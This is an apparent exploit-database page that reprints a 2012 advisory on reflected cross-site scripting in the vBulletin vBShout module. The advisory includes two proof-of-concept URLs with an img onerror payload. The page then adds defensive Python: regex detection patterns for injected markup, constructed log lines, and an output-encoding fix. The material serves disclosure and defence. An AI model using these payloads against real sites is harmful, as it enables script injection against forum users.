CVE | Category | Price | Severity |
---|---|---|---|
CVE-2020-17496 | CWE-79 | $500 | Medium |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2012-03-26 |
CVSS | EPSS | EPSS percentile |
---|---|---|
Not available | 0.02192 | 0.50148 |
```text
# Title: vBulletin vBShout Module <= 6.0.5 (vbshout.php?message=) - Reflected Cross-Site Scripting ( XSS )
# Note: HTML Injection and Redirect works too
# Script Page : http://www.dragonbyte-tech.com
# Date: 24-03-2012
# Author : Avram Marius Gabriel (d3v1l)
# RandomStorm - http://www.randomstorm.com
# Tested on: Windows XP & Vista
###############################################################################################################
# The last version of vBulletin vBShout Module suffers from Cross-Site Scripting and HTML Injection.
# The issue is located in Shoutbox Search Archive.
# POC:
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
# http://www.site.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&s=&do=archive&instanceid=1
################################################################################################################
# vBShout is the ideal way to keep members on your forum while they wait for replies to their posts. It can be used in many ways - as a chat room for members, for staff to discuss issues in realtime, as a live-update feed of new posts and threads, as a way to track member milestones
################################################################################################################
-- Check My Blog <http://security-sh3ll.blogspot.com> or Follow me on Twitter <http://twitter.com/securityshell>
```
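The advisory shows a search parameter (`message`) of `vbshout.php` being reflected into the archive-search form without encoding. From the defender's side there are two things worth having in hand: a log check that flags requests carrying markup in the reflected parameters, and the output-encoding fix that neutralises such input when a template must echo it back. The Python below is an added example written for this page; it is not part of the advisory or of vBShout. The access-log lines are constructed, the list of watched parameter names is taken from the PoC URLs above, and the `render_search_field` helper is a hypothetical stand-in for the template that prints the search box.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Markup fragments that have no business in a plain-text search term.
MARKUP_PATTERNS = [
    re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I),  # any HTML tag open/close
    re.compile(r"\bon[a-z]+\s*=", re.I),           # inline event handler (onerror=, onload=, ...)
    re.compile(r"javascript\s*:", re.I),           # javascript: URL scheme
]

# vbshout.php parameters that the archive-search form reflects (names from the advisory's PoC URLs).
WATCHED_PARAMS = {"message", "username", "hours", "s"}

# Constructed combined-format access-log lines; not real traffic. The second line carries
# the advisory's PoC payload percent-encoded, as a browser would send it.
SAMPLE_LOG = """\
203.0.113.10 - - [26/Mar/2012:10:01:02 +0000] "GET /vbshout.php?message=hello+world&s=&do=archive&instanceid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.11 - - [26/Mar/2012:10:01:07 +0000] "GET /vbshout.php?message=%22%3E%3Ctextarea%3E%3C%21--+%3C%2Ftextarea%3E%3Cimg+src%3D1+onerror%3Dalert%28%22XSS%22%29%3E&s=&do=archive&instanceid=1 HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
203.0.113.12 - - [26/Mar/2012:10:02:00 +0000] "GET /forumdisplay.php?f=2 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def suspicious_params(target: str) -> dict:
    """Return {param: decoded_value} for watched vbshout.php params whose value contains markup."""
    parts = urlsplit(target)
    if not parts.path.endswith("/vbshout.php"):
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            # parse_qs already decoded once; decode again so a double-encoded value is not missed.
            decoded = unquote_plus(value)
            if any(p.search(decoded) for p in MARKUP_PATTERNS):
                hits[name] = decoded
    return hits


def scan_log(text: str) -> list:
    """Return a list of (client_ip, param, decoded_value) for every flagged request line."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        for name, value in suspicious_params(m.group("target")).items():
            findings.append((client_ip, name, value))
    return findings


def render_search_field(message: str) -> str:
    """Hypothetical hardened template fragment: attribute-encode the term before echoing it.

    html.escape with quote=True turns the closing quote and angle brackets of a payload into
    entities, so the value can no longer break out of the attribute or start a new tag.
    """
    return '<input type="text" name="message" value="%s">' % html.escape(message, quote=True)


if __name__ == "__main__":
    for client_ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{client_ip} sent markup in parameter {name!r}: {value[:60]}")
    print(render_search_field('"><img src=1 onerror=alert(1)>'))
```

Running the block flags only the second constructed line (the parameter `message` from 203.0.113.11) and prints the search field with the payload rendered inert. The detector is deliberately narrow (one script, four parameters); the same `suspicious_params` loop generalises to any reflected parameter by widening `WATCHED_PARAMS`.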